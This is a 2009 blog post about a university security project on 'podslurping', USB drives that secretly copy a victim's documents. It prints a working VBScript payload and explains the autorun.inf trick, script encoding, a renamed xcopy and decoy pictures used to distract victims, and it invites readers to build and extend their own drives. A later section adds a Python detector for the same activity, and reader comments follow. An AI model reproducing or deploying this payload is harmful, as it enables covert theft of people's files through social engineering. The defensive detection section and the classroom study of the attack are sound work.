2009-04-07 20:09:56

Podslurping

During the second half of the Spring 2009 semester, I am taking a class on Information Security Assurance and Auditing. We are required to complete a final project, given some pre-defined topics. The only topic that was REMOTELY appealing was "podslurping." At the first chance, Rhuel and I asked to do that for our project.
I recommend you download the archive (end of the article) and read through the presentation first. (The presentation is given in PPT and PDF form, since some systems may not have the specific font used in the PPT thus making it render incorrectly.) You may also listen to the MP3 of our presentation, found at the end of this article.
So what I'd like to do is go over the contents of the archive so you know what you have to do to make your own podslurping USB drives. First, you'll notice there are two folders: std and u3. Inside of those folders are the files that you'll need to place on a standard USB drive for the "social engineering" version and the U3 USB drive for the "fully automatic" version, respectively.

NOTE: The files in the u3 folder do NOT get placed directly on the USB drive like the std files do. Instead, you need to use the U3 Installer, which will make an ISO from the u3 directory and "burn" that ISO to the U3/ROM portion of the U3 drive.

In the std directory you will find a pictures directory, which contains some images to assist in your social engineering (keep the person's attention while their files are being stolen). The autorun.inf file executes our script when activated by Autoplay, and also if the user tries to be sneaky and right-clicks the drive, selecting either Open or Explore. So we can even trick some savvy users... The icon file, image.ico, is used in the Autoplay dialog to make it really look like this drive was meant to display pictures. The script, written in VBScript since it is native to Windows, has been encoded so that most people will not be able to discover what it does. You can read about script encoding in my previous article, Fooify your VBScript. The executable, defaults.exe, is actually xcopy.exe. We renamed it so it appears harmless and as if it's just a random file that was on the drive from the factory. The text file, exclude.txt, lists file extensions that we don't want to copy, such as multimedia files. We're only interested in business-related files.
Since the fully automatic, U3, version isn't meant to socially engineer anyone, the images are removed from that directory and are not opened by the script.
Since the U3 script is just a slimmed down version of the standard script, I will only display the standard script. Plus, you downloaded the archive, so you have everything already.
On Error Resume Next

''''''''''''''''''''
' Set some variables
''''''''''''''''''''
ComputerName = "."
Set oShell = CreateObject("Wscript.Shell")
Set objWMIService = GetObject("winmgmts:\\" & ComputerName & "\root\CIMV2")
Const wbemFlagReturnImmediately = &h10
Const wbemFlagForwardOnly = &h20
Const HKLM = &H80000002
sProfileRegBase = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList"

''''''''''''''''''''''''''
' Get the system directory
''''''''''''''''''''''''''
Set colItems = objWMIService.ExecQuery _
    ("SELECT WindowsDirectory FROM Win32_OperatingSystem", "WQL", _
    wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem In colItems
    windowsDir = objItem.WindowsDirectory
Next

''''''''''''''''''''''''''''
' Pop a window with the pics
''''''''''''''''''''''''''''
sCmd = windowsDir & "\explorer.exe /n,.\pictures"
oShell.Run sCmd,1,False

''''''''''''''''''''''''''''''''''''''''''''''''''
' Get the user profile directory from the registry
''''''''''''''''''''''''''''''''''''''''''''''''''
Set oReg = GetObject("WinMgmts:{impersonationLevel=impersonate}!//" & _
    ComputerName & "/root/default:StdRegProv")
oReg.GetExpandedStringValue HKLM, sProfileRegBase, "ProfilesDirectory", _
    profilePath

''''''''''''''''''''''''''''
' Get the computer/user name
''''''''''''''''''''''''''''
Set colItems = objWMIService.ExecQuery _
    ("SELECT Name,UserName FROM Win32_ComputerSystem", "WQL", _
    wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem In colItems
    systemName = objItem.Name
    fullUserName = objItem.UserName
Next
userNameArr = Split(fullUserName, "\")
userName = userNameArr(1)

'''''''
' Slurp
'''''''
sCmd = ".\defaults.exe """ & profilePath & "\" & userName & _
    "\My Documents\*.*"" " & ".\" & systemName & _
    " /s/c/q/r/h/i/y /EXCLUDE:exclude.txt"
oShell.Run sCmd,0,True

'''''''''
' Cleanup
'''''''''
Set oShell = Nothing
Set objWMIService = Nothing
Set oReg = Nothing
NOTE: Do NOT copy/paste the above script and expect it to work. I did some line breaking to make sure it fit in a browser window and am not 100% sure that it will still work.
So here's what's going on in a nutshell. We make use of two main parts of the Windows OS, WScript and the Windows Management Instrumentation (WMI). In our "variables" section we call upon WScript to make us a shell so that we can execute commands and we set up our connection to WMI so that we can query the system for information about itself. We also set some flags and some registry locations, since we'll be needing to read the registry later.
The first real section uses WMI to figure out where the host's system directory is. We cannot assume that Windows was installed in C:\Windows, so we ask the system where its system directory is.
That is enough information to begin our social engineering. We now know where explorer.exe is located, so we can pop a window with our pictures, hoping to keep the person busy while the rest of the script executes. The critical part of this section is the end of the Run command. The last two arguments are 1 and False. The 1 says to run the command in the foreground (we want the explorer window to be seen) and the False says to continue executing the script instead of waiting for the explorer window to be closed first. This ensures that the file stealing starts immediately.
What we ultimately want to do is copy the currently logged in user's My Documents directory to our USB drive. We need to know a few things first. Number one, where user profiles are stored. We cannot assume that they are in "Documents and Settings," because Vista stores them in "Users," and if roaming profiles are configured they are stored somewhere on the network. So we have to read the registry to find out where the profiles directory is.
The next piece of information we need is the username of the currently logged in user and the hostname of the victim's host (we name the directory on our USB drive after the victim's hostname). These two pieces of information can be retrieved via one query to WMI. As you can see, the username comes out as DOMAIN\USERNAME, so we have to do a little string manipulation to extract ONLY the username.
Now we have everything we need to steal some files. The next part of the script calls defaults.exe (XCopy) and copies the business-related files from the user's My Documents directory to our USB drive.
That's it. Pretty simple, right? Of course, we didn't account for everything. Feel free to take the script and extend it to look in multiple locations or copy files for multiple users (instead of only the currently logged in user). I have plans to port this script to *nix and OSX so that I can have a single USB drive that can slurp from any machine. We'll see if I ever get around to doing that ;)
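From the defender's side, the walkthrough above describes three things a host's process-creation log will show: a process launched from removable media by a script host, an xcopy.exe running under another name (defaults.exe), and a recursive copy of a user's profile onto the USB drive with an exclusion list. The Python triage function below, an added example that is not part of the original post or the archive, flags those patterns in Sysmon-style process-creation records; the sample records, the removable-drive set and the field names are constructed assumptions.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields), not real logs.
# Assumption: E: is the removable drive, known from a drive inventory feed; C: is fixed.
REMOVABLE_DRIVES = {"E:"}

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"C:\Windows\explorer.exe /n,.\pictures", "OriginalFileName": "EXPLORER.EXE"},
    {"Image": r"E:\defaults.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'.\defaults.exe "C:\Users\alice\My Documents\*.*" .\WS-ALICE /s/c/q/r/h/i/y /EXCLUDE:exclude.txt',
     "OriginalFileName": "XCOPY.EXE"},
    {"Image": r"C:\Windows\System32\xcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"xcopy C:\build\out D:\backup /s", "OriginalFileName": "XCOPY.EXE"},
]

def drive_of(path):
    """Drive letter ('E:') of a full Windows path, or None for relative paths."""
    m = re.match(r"([A-Za-z]:)", path)
    return m.group(1).upper() if m else None

def basename(path):
    return path.rsplit("\\", 1)[-1]

def analyze(event, removable=REMOVABLE_DRIVES):
    """Return the list of reasons this event looks like podslurping activity."""
    reasons = []
    image, parent, cmd = event["Image"], event["ParentImage"], event["CommandLine"]
    orig = event.get("OriginalFileName", "")
    # 1. A renamed binary: the PE version info (OriginalFileName) disagrees with the on-disk name.
    if orig and orig.upper() != basename(image).upper():
        reasons.append(f"renamed binary: {basename(image)} is really {orig}")
    # 2. Code running from removable media, and the Autoplay -> script host -> payload chain.
    if drive_of(image) in removable:
        reasons.append(f"executable launched from removable drive {drive_of(image)}")
        if basename(parent).lower() in ("wscript.exe", "cscript.exe"):
            reasons.append("script host spawned a process on removable media")
    # 3. xcopy (under any name) recursing through a profile directory with an exclusion list.
    profile_dir = re.search(r"\\(Users|Documents and Settings)\\", cmd, re.I)
    if orig.upper() == "XCOPY.EXE" and profile_dir and "/s" in cmd.lower() and "/exclude:" in cmd.lower():
        reasons.append("bulk recursive copy of a user profile with an exclusion list")
    return reasons

def triage(events, removable=REMOVABLE_DRIVES):
    """Keep only the events that produced at least one reason, with their reasons."""
    return [(e["CommandLine"], analyze(e, removable)) for e in events if analyze(e, removable)]
```

A legitimate xcopy backup (third record) and the explorer window the script pops (first record) produce no reasons, so the renamed-binary and profile-copy checks carry the signal rather than xcopy usage itself.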

Download slurp.tar.bz2


Download podslurping.mp3


5 comments


2009-04-08 09:20:40


DeVito says...
I never heard of this...Very Good Presentation!!!

2009-04-08 09:43:29


slonkak says...
Thanks, man! I'm glad you found it interesting, however useful (useless) it may be for the non-criminal ;)

2009-11-22 07:37:13


KosK says...
Thanks mate! I have the same project at my computer security class and your presentation proved a lot helpful! Very well done!!!

2010-12-14 11:13:11


Rhuel says...
How are the *nix and OSX versions coming along? ;-) I currently work with a guy that used to work with Abe Usher back at NGC. Small world.

2010-12-14 11:19:39


slonkak says...
I think the question is, have I even looked at this since we finished our presentation...?
